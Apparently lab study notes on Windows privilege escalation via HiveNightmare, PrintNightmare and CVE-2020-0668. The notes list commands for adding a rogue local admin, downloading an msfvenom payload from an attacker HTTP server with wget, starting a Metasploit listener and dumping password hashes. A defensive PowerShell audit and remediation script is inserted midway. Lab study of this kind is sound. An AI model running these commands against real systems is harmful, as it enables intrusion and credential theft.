
kernel-exploit

Enumeration Commands

systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolss

Exploitation Commands

HiveNightmare.exe

impacket-secretsdump

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

msfvenom

python3 -m http.server <port>

wget http://<ip>:<port>/<file>

CVE-2020-0668.exe <source> <destination>

copy /Y <source> <destination>

msfconsole -r <resource_file>

net start MozillaMaintenance

Verification Commands

net user hacker
getuid
hashdump

Key Concepts:

  • Kernel Exploits:
    - Exploit vulnerabilities in the Windows kernel for privilege escalation.
    - Patching is crucial, but often incomplete.

  • Historical Vulnerabilities:
    - MS08-067 (Server service RCE).
    - MS17-010 (EternalBlue, SMB RCE).
    - ALPC Task Scheduler 0-Day (Local privilege escalation).
    - CVE-2021-36934 (HiveNightmare, registry access).
    - CVE-2021-1675/CVE-2021-34527 (PrintNightmare, print spooler RCE).
    - CVE-2020-0668 (Service Tracing local privilege escalation).

  • Patch Management:
    - Importance of keeping systems updated.
    - Older vulnerabilities remain relevant.

Approach, Commands, Tools, and Techniques:

  1. Enumeration:
    - systeminfo, wmic qfe list brief, Get-Hotfix (Installed updates).
    - icacls (File permissions).
    - whoami /priv (User privileges).
    - ls \\localhost\pipe\spoolss (Spooler service check).

  2. Exploitation:
    - HiveNightmare (CVE-2021-36934):
      - HiveNightmare.exe (Dump registry hives).
      - impacket-secretsdump (Extract hashes).
    - PrintNightmare (CVE-2021-1675/CVE-2021-34527):
      - Set-ExecutionPolicy Bypass -Scope Process (Bypass PowerShell execution policy).
      - Import-Module .\CVE-2021-1675.ps1 (Import PowerShell exploit).
      - Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" (Add local admin).
    - CVE-2020-0668 (Service Tracing):
      - Build exploit in Visual Studio.
      - msfvenom (Generate malicious binary).
      - Python HTTP server, wget (Download binary).
      - CVE-2020-0668.exe (Run exploit).
      - copy (Replace service binary).
      - Metasploit resource script, msfconsole -r (Start listener).
      - net start MozillaMaintenance (Start service).

  3. Verification:
    - net user hacker (Verify user creation).
    - getuid (Meterpreter, verify SYSTEM privileges).
    - hashdump (Meterpreter, dump password hashes).
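The enumeration step above looks for two host conditions that the exploitation step then relies on: hive files readable by ordinary users (HiveNightmare) and a running Print Spooler (PrintNightmare). The following PowerShell is an added defender-side check for both, with the vendor-documented remediation behind a -Remediate switch; it is not part of the original notes or of any of the tools listed, and it assumes Windows PowerShell 5.1 or later. The function names are the author's own.

```powershell
# Added example (not from the original notes): audit the two host conditions the
# enumeration section probes, and optionally apply the documented fixes.
function Test-HiveNightmareExposure {
    # CVE-2021-36934 state: BUILTIN\Users holds an Allow ACE with read access on
    # %SystemRoot%\System32\config\SAM (the SYSTEM and SECURITY hives alike).
    $samPath = Join-Path $env:SystemRoot 'System32\config\SAM'
    try {
        $acl = Get-Acl -Path $samPath -ErrorAction Stop
    } catch {
        # A standard user normally cannot read the security descriptor at all;
        # that is the expected hardened state, so report "not exposed".
        return $false
    }
    $readBits = [System.Security.AccessControl.FileSystemRights]::ReadData
    $usersRead = $acl.Access | Where-Object {
        $_.IdentityReference.Value -like '*\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        (($_.FileSystemRights -band $readBits) -ne 0)
    }
    return [bool]$usersRead
}

function Test-SpoolerRunning {
    # The notes test for \\localhost\pipe\spoolss; the service object answers
    # the same question without touching the named pipe.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    return ($null -ne $svc -and $svc.Status -eq 'Running')
}

function Invoke-KernelExploitHardening {
    param([switch]$Remediate)
    $findings = [ordered]@{
        HiveNightmare = Test-HiveNightmareExposure
        Spooler       = Test-SpoolerRunning
    }
    if ($Remediate) {
        if ($findings.HiveNightmare) {
            # Microsoft's published workaround: restore inheritance on the hive
            # files. Shadow copies made earlier still contain readable hives and
            # have to be removed separately (vssadmin delete shadows).
            icacls "$env:SystemRoot\System32\config\*.*" /inheritance:e | Out-Null
        }
        if ($findings.Spooler) {
            # Stop and disable the spooler on hosts that do not print.
            Stop-Service -Name Spooler -Force
            Set-Service -Name Spooler -StartupType Disabled
        }
    }
    return [pscustomobject]$findings
}

Invoke-KernelExploitHardening   # add -Remediate from an elevated prompt to fix
```

Run it once as an unprivileged user to see what an attacker on the box would see, then with -Remediate from an elevated session; re-running without the switch should report both findings as False.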

Commands:

  • systeminfo, wmic qfe list brief, Get-Hotfix, icacls, whoami /priv, ls, Set-ExecutionPolicy, Import-Module, Invoke-Nightmare, msfvenom, python3 -m http.server, wget, copy, msfconsole, net user, net start, getuid, hashdump, impacket-secretsdump.

Tools:

  • HiveNightmare.exe, impacket, Metasploit, PowerShell scripts, custom exploits.

Task:

  • RDP to the target.

  • Exploit HiveNightmare, PrintNightmare, and CVE-2020-0668.

  • Escalate privileges to NT AUTHORITY\SYSTEM.

  • Retrieve the flag from the Administrator Desktop.
